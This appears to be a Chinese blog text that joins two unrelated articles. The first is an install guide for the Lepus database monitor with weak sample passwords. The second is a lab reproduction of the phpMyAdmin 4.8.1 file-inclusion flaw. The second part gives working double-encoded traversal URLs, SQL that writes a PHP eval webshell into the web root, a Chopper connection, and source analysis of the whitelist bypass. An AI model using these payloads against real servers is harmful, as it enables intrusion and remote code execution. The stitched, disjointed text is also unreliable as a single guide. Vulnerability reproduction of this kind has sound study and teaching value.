一、軟件介紹
Lepus是一套開源的數據庫監控平臺,目前已經支持MySQL、Oracle、SQLServer、MongoDB、Redis等數據庫的基本監控和告警(MySQL已經支持復制監控、慢查詢分析和定向推送等高級功能)。Lepus無需在每臺數據庫服務器部署腳本或Agent,只需要在數據庫創建授權帳號后,即可進行遠程監控,適合監控數據庫服務器較多的公司和監控云中數據庫,這將為企業大大減化監控部署流程,同時Lepus系統內置了豐富的性能監控指標,讓企業能夠在數據庫宕機前發現潛在性能問題進行處理,減少企業因為數據庫問題導致的直接損失。
二、環境搭建,以及準備工作
1,官方推薦系統centos或者是Redhat,本次選用Centos7.5。
2,官方推薦xampp搭建LAMP環境,本次選用yum安裝LAMP,理由簡單使用習慣。
3,軟件下載MySQLdb-python、Lepus數據庫企業監控系統3.7版本。
4,安裝LAMP之前請準備一個干凈系統環境,需要提前安裝SNMP服務,無需安裝任何其它服務。
三、正式部署
1,配置YUM源
1)備份YUM源:
[root@lepus ~]mv /etc/yum.repos.d/CentOS-Base.repo /etc/yum.repos.d/CentOS-Base.repo.backup2)下載新的CentOS-Base.repo 到/etc/yum.repos.d/
[root@lepus ~]wget -O /etc/yum.repos.d/CentOS-Base.repo http://mirrors.aliyun.com/repo/Centos-7.repo3)生成緩存文件。
[root@lepus ~]yum makecachemakecache
2,安裝LAMP環境
1)安裝lamp環境
[root@lepus ~]# yum install -y httpd php php-mysql mariadb-server mariadb-devel2)啟動httpd和mariadb服務并設置開機自動啟動
[root@lepus ~]# systemctl start httpd.service
[root@lepus ~]# systemctl enable httpd.service
[root@lepus python]# systemctl start mariadb.service
[root@lepus python]# systemctl enable mariadb.servicehttpd
mariadb
3) 新建軟件存放目錄并上傳軟件
[root@lepus ~]# mkdir -p /data/tools
[root@lepus ~]# rz #如果提示沒有這個命令請執行yum -y install lrzsz上傳軟件
4)切換到/data/tools目錄下安裝軟件
[root@lepus ~]# cd /data/tools/
[root@lepus tools]# ls
lepus3.7.zip MySQLdb-python.zip percona-toolkit_2.2.12.tar.gz5)解壓MySQLdb-python.zip
[root@lepus tools]# unzip MySQLdb-python.zip6)切換至MySQLdb1-master/
[root@lepus tools]# cd MySQLdb1-master/
[root@lepus MySQLdb1-master]# which mysql_config
/usr/bin/mysql_config
[root@lepus MySQLdb1-master]# vim site.cfg +13
修改第13項:mysql_config=/usr/bin/mysql_config 后保存退出site.cfg
7)繼續安裝python setup.py build會有錯誤提示
[root@lepus MySQLdb1-master]# python setup.py buildpython-pip
8)解決安裝python2-pip
[root@lepus MySQLdb1-master]# yum install -y python2-pip9)再次執行python setup.py build還是有錯誤
python-devel
10)安裝python-devel后錯誤解決
[root@lepus MySQLdb1-master]# yum install -y python-devel
[root@lepus MySQLdb1-master]# python setup.py buildpython setup.py build
11)接著安裝python setup.py install
[root@lepus MySQLdb1-master]# python setup.py installpython setup.py install
12)測試各個驅動是否正常運行,切換至/data/tools/
[root@lepus MySQLdb1-master]# cd /data/tools/
[root@lepus tools]# unzip lepus3.7.zip
[root@lepus tools]# cd lepus_v3.7/python
[root@lepus python]# python test_driver_mysql.py
MySQL python drivier is ok!drivicer is ok
13)修改數據庫密碼,登錄數據庫并創建數據庫和授權用戶
[root@lepus python]# mysqladmin -uroot password 'Pass123!'
[root@lepus python]# mysql -uroot -pPass123!
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 3
Server version: 5.5.64-MariaDB MariaDB Server
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> create database lepus default character set utf8;
Query OK, 1 row affected (0.00 sec)
MariaDB [(none)]> grant all on lepus.* to lepus@localhost identified by 'Pass123!';
Query OK, 0 rows affected (0.00 sec)
MariaDB [(none)]> exit
Bye
[root@lepus python]#cd ../sql #進入SQL導入數據到數據庫中
[root@lepus sql]# mysql -ulepus -pPass123! lepus <lepus_table.sql
[root@lepus sql]# mysql -ulepus -pPass123! lepus <lepus_data.sql
[root@lepus sql]# cd ../python/
[root@lepus python]#chmod + x install.sh
[root@lepus python]# ./install.sh./install.sh
14)編輯配置文件
[root@lepus lepus]# vim etc/config.inivim etc/config.ini
15)切換到lepus的PHP目錄
[root@lepus lepus]# cd /data/tools/lepus_v3.7/php/16)拷貝PHP目錄下的數據到http的目錄下
[root@lepus php]# cp -a . /var/www/html/17)重啟httpd 服務
[root@lepus ~]# systemctl restart httpd.service18)切換目錄至/var/www/html下,修改配置文件
[root@lepus php]# cd /var/www/html
[root@lepus html]# vim application/config/database.php +53application/config/database.php
四、添加監控服務器
1,無論是監控端還是被監控端都需要安裝SNMP這個服務,如果沒有安裝需要安裝snmp。
[root@lepus ~]# yum install net-snmp* -y2,配置一下snmp服務選項,需要修改42行、62行及85行的配置(兩端的配置需要一致)。
[root@zabbix ~]# vim /etc/snmp/snmpd.conf
在42行添加一條監控ServerIP和團體名稱
sec.name source community
com2sec notConfigUser 10.93.58.209 lepus_monitor
在62行把原來的systemview改為all
group context sec.model sec.level prefix read write notif
access notConfigGroup "" any noauth exact all none none
在85行將#注釋符號去掉
## incl/excl subtree mask
view all included .1 803,在被監控的主機上添加數據庫訪問授權,最后查詢授權情況
mysql> grant select,process,super on *.* to 'lepus_monitor'@'ip' identified by 'Pass123!';
Query OK, 0 rows affected (0.00 sec)
mysql> flush privileges;
Query OK, 0 rows affected (0.00 sec)
mysql>select user,authentication_string,plugin,host FROM mysql.user;4,打開瀏覽器輸入http://IP 就可登錄了,默認用戶名及密碼admin/Lepusadmin
用戶名及密碼
5,添加MySQL參數
添加配置
6,填寫IP地址、數據庫授權用戶及密碼
IP地址等信息
7,添加后出圖如下。
被監控主機顯示
8,查看日志輸出
[root@lepus ~]# tail -f /usr/local/lepus/logs/lepus.logtail-f
9,至此監控MySQL監控添加完成后續,在設置郵件報警慢查詢,表空間監控項。
總結:希望對各位朋友有所幫助,文章有點長,感謝您的觀賞,希望能與您多交流一起討論,當然有需要這些軟件的朋友你可以私信與我,再次感謝各位。
PS:前面兩部分內容會簡單講解phpMyAdmin 4.8.1版本配置過程,如果讀者只想了解漏洞,可以從第三部分開始閱讀。還請見諒~
phpMyAdmin是一種MySQL數據庫的管理工具,安裝該工具后,即可通過Web形式直接管理MySQL數據,而不需要通過執行系統命令來管理,非常適合對數據庫操作命令不熟悉的數據庫管理者,下面詳細說明該工具的安裝方法。
第一步,下載phpMyAdmin 4.8.1。
第二步,配置環境。
打開libraries目錄下的config.default.php文件,依次找到下面各項,按照說明配置即可。
修改MySQL的用戶名和密碼,phpMyAdmin使用MySQL默認用戶名root,密碼設置為“123456”。
/**
* MySQL user
*
* @global string $cfg['Servers'][$i]['user']
*/
$cfg['Servers'][$i]['user']='root';
/**
* MySQL password (only needed with 'config' auth_type)
*
* @global string $cfg['Servers'][$i]['password']
*/
$cfg['Servers'][$i]['password']='123456';
認證方法設置為“cookie”,登錄phpMyAdmin時需要用戶名和密碼進行驗證。在此有cookie、http、signon、config四種模式可供選擇。
/**
* Authentication method (valid choices: config, http, signon or cookie)
*
* @global string $cfg['Servers'][$i]['auth_type']
*/
$cfg['Servers'][$i]['auth_type']='cookie';
第三步,運行WAMP軟件,并將WAMP中phpMyAdmin替換成4.8.1版本。
替換如下圖所示:
運行Apache和MySQL如下圖所示。
問題1: 當我們輸入用戶名“root”、密碼“123456”時,很可能會報錯“mysqli_real_connect(): (HY000/1045): Access denied for user ‘root’@‘localhost’ (using password: YES)”。提示是錯誤1045,告訴我們錯誤是由于沒有訪問權限,所以訪問被拒絕了,主要原因就是由于該用戶名所對應的密碼錯誤。
第四步,檢查配置文件中的主機、用戶名和密碼,并確認這些信息與 MySQL 服務器管理員所給出的信息一致。設置controluser和controlpass。
/**
* MySQL control user settings (this user must have read-only
* access to the "mysql/user" and "mysql/db" tables). The controluser is also
* used for all relational features (pmadb)
*
* @global string $cfg['Servers'][$i]['controluser']
*/
$cfg['Servers'][$i]['controluser']='root';
/**
* MySQL control user settings (this user must have read-only
* access to the "mysql/user" and "mysql/db" tables). The controluser is also
* used for all relational features (pmadb)
*
* @global string $cfg['Servers'][$i]['controlpass']
*/
$cfg['Servers'][$i]['controlpass']='123456';
第五步,修改“config.sample.inc.php”(或config.inc.php)文件內容。
設置controluser和controlpass值。
修改如下:
$cfg['Servers'][$i]['controluser']='root';
$cfg['Servers'][$i]['controlpass']='123456';
$cfg['Servers'][$i]['user']='root';
$cfg['Servers'][$i]['password']='123456';
第六步,接著登錄phpMyAdmin,輸入“root”和“123456”之后進入數據庫管理主界面。
接著我們使用phpMyAdmin搭建一個簡單的網站試試。
第一步,創建數據庫。
第二步,創建數據表 student,點擊執行。
第三步,設置表的字段,包括:id、username、password。
第四步,查看我們創建好的數據表student。
第五步,插入數據并查詢。
INSERT INTO `student`(`id`, `username`, `password`) VALUES ('1', 'yangxiuzhang','6666666');
INSERT INTO `student`(`id`, `username`, `password`) VALUES ('2', 'Eastmountain','123456');
此時數據顯示如下圖所示:
第六步,編寫PHP代碼將我們數據庫中的內容顯示出來。
訪問地址:http://localhost:8088/20200110.php
<?php
echo('<h2>數據庫測試</h2>');
//鏈接數據庫
$con=mysqli_connect("localhost", "root", "123456", "eastmount");
if (!$con)
{
die('Could not connect database: ' . mysqli_error());
}
//設置查詢結果編碼
$con->set_charset('utf8');
//查詢學生信息
$sql="SELECT * FROM `student` ";
//得到查詢結果
$result=$con->query($sql);
//遍歷結果
while($row=$result->fetch_array()){
list($id,$username, $password)=$row;
echo $id.' ';
echo $username.' ';
echo $password;
echo '<br >';
}
//關閉連接
$con->close();
?>
顯示結果如下圖所示:
如果需要查看配置信息,這使用“phpinfo()”函數實現。
<?php
phpinfo();
?>顯示結果如下圖所示,PHP的配置信息。
寫到這里,我們的環境已經搭建成功,接下來我們開始講解phpMyAdmin漏洞吧。可能很多博友會疑惑,為什么前面花費這么多時間講解環境搭建了,兩個原因吧!一方面作者是從零開始學習,通過環境搭建來復現該漏洞;另一方面照顧初學者,希望通過通俗易懂的步驟能實現文章的實驗,也希望安全圈的大牛們別笑,哈哈~都是一點一滴成長起來的。
原因:phpMyadmin 4.8.1版本的index.php中存在文件包含漏洞,通過二次編碼可繞過過濾。
第一步,根據該版本CVE漏洞構造URL,在index.php后添加內容,如顯示/etc/passwd詳細內容。
/* 方法一 */
http://localhost:8088/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
/* 方法二 */
http://localhost:8088/phpmyadmin/index.php?target=db_datadict.php%253f/../../../../../../../../../Windows/DATE.ini
第二步,通過目錄穿越包含任意文件。
第三步,執行SQL語句查詢數據庫路徑。結果為:C:\xampp\mysql\data\。
show global variables like "%datadir%";
第四步,向數據庫寫入php代碼。創建數據庫rce和表rce,并插入php代碼。
CREATE DATABASE rce;
use rce;
CREATE TABLE rce(code varchar(100));
INSERT INTO rce(code) VALUES("<?php phpinfo(); ?>");
輸出結果如下圖所示:
然后我們可以看到插入的php代碼,如下所示。
第五步,在SQL中執行select ‘<?php phpinfo() ?>’,然后查看當前頁面cookie中的phpmyadmin的值。
通過瀏覽器查看網絡的Cookie值。
第六步,構建包含Session值的URL路徑。
F12查看網站Session值,訪問/index.php?target=db_sql.php%253f/…/…/…/…/…/…/tmp/sess_[session]。
?target=db_datadict.php%253f/../../../../../../../../../phpStudy/PHPTutorial/tmp/tmp/sess_imnnv91q886sfboa2sqos02b7njvho24
訪問能顯示如下圖所示的信息:
第七步,在phpInfo默認頁面找到網站的安裝位置:/var/www/html,然后寫入一句話木馬。
select '<?php @eval($_POST[hcl]) ?>' into outfile '/var/www/html/hcl.php'
第八步,通過菜刀連接 http://ip/hcl.php。菜刀連接成功,在根目錄下找到了key.txt文件,查看key.txt文件,獲得key值。
簡單總結:
利用phpMyAdmin 4.8.1后臺文件包含漏洞,獲取登錄phpmyadmin系統所產生的sess_sessionID文件,然后通過文件繞過獲取相關信息并植入木馬,最終獲取webshell。通常linux系統中存放路徑為/tmp/sess_[當前會話session值]。
在phpMyAdmin 4.8.1版本的index.php文件中,第50-63行代碼如下:
$target_blacklist=array (
'import.php', 'export.php'
);
// If we have a valid target, let's load that script instead
if (! empty($_REQUEST['target'])
&& is_string($_REQUEST['target'])
&& ! preg_match('/^index/', $_REQUEST['target'])
&& ! in_array($_REQUEST['target'], $target_blacklist)
&& Core::checkPageValidity($_REQUEST['target'])
) {
include $_REQUEST['target'];
exit;
}
它的含義是:
target傳入不能為空
target必須是一個字符串
target不能以index開頭
target不能在數組target_blacklist中
target經過checkPageValidit檢查后為真
前面三個大家都容易理解,第四個判斷是黑名單判斷。在index.php中已經定義好了target_blacklist的值,它們是import.php和export.php,只要不等于這兩個值就可以。
再看第五個判斷,Core::checkPageValidity($_REQUEST[‘target’]為真,通過全局搜索發現了代碼在libraries\classes\Core.php文件的第443-476行。
public static function checkPageValidity(&$page, array $whitelist=[])
{
if (empty($whitelist)) {
$whitelist=self::$goto_whitelist;
}
if (! isset($page) || !is_string($page)) {
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page=mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page=urldecode($page);
$_page=mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
return false;
}
在checkPageValidit中有兩個形參,第一個是傳入的target,第二個whitelist則有默認形參,也就是空的數組。進入函數首先會判斷whitelist是否為空,如果為空則將定義的goto_whitelist賦值給whitelist(因為確實為空,我們只傳進去一個target)。接著我們來看看goto_whitelist的代碼。
public static $goto_whitelist=array(
'db_datadict.php',
'db_sql.php',
'db_events.php',
'db_export.php',
'db_importdocsql.php',
'db_multi_table_query.php',
'db_structure.php',
'db_import.php',
'db_operations.php',
'db_search.php',
'db_routines.php',
'export.php',
'import.php',
'index.php',
'pdf_pages.php',
'pdf_schema.php',
'server_binlog.php',
'server_collations.php',
'server_databases.php',
'server_engines.php',
'server_export.php',
'server_import.php',
'server_privileges.php',
'server_sql.php',
'server_status.php',
'server_status_advisor.php',
'server_status_monitor.php',
'server_status_queries.php',
'server_status_variables.php',
'server_variables.php',
'sql.php',
'tbl_addfield.php',
'tbl_change.php',
'tbl_create.php',
'tbl_import.php',
'tbl_indexes.php',
'tbl_sql.php',
'tbl_export.php',
'tbl_operations.php',
'tbl_structure.php',
'tbl_relation.php',
'tbl_replace.php',
'tbl_row_action.php',
'tbl_select.php',
'tbl_zoom_select.php',
'transformation_overview.php',
'transformation_wrapper.php',
'user_password.php',
);
接著分析代碼,如果page在白名單中就會直接return true,但這里考慮到了可能帶參數的情況,所以有了下面的判斷。
下圖的代碼中,mb_strpos函數是查找string在另一個string中首次出現的位置。_page變量是獲取page問號前的內容,是考慮到target有參數的情況,只要_page在白名單中就直接return true。但還考慮了url編碼的情況,所以如果這步判斷未成功,下一步又進行url解碼。
當傳入二次編碼后的內容,會讓checkPageValidity()這個函數返回true,但index中實際包含的內容卻不是白名單中的文件。
例如:傳入“?target=db_datadict.php%253f ”,由于服務器會自動解碼一次,所以在checkPageValidity()中,page的值一開始會是“db_datadict.php%3f”,又一次url解碼后變成了“db_datadict.php?”,這時符合了?前內容在白名單的要求,函數返回true。
但在index.php中_REQUEST[‘target’]仍然是“db_datadict.php%3f”,而且會被include,通過目錄穿越,就可造成任意文件包含。最終通過該漏洞實現了上述攻擊,這個漏洞也很快被修復并發布新版本。
寫到這里,這篇基礎性文章就此結束,希望文章對您有所幫助。本文利用phpMyAdmin 4.8.1后臺文件包含漏洞,獲取登錄phpmyadmin系統所產生的sess_sessionID文件,然后通過文件繞過獲取相關信息并植入木馬,最終獲取webshell。同時,此漏洞是登陸后才可以使用的,比較雞肋。一般登陸后直接執行SQL語句生成shell即可,但有時目錄權限比較嚴格,不能在WEB目錄內生成,則可以結合本例使用。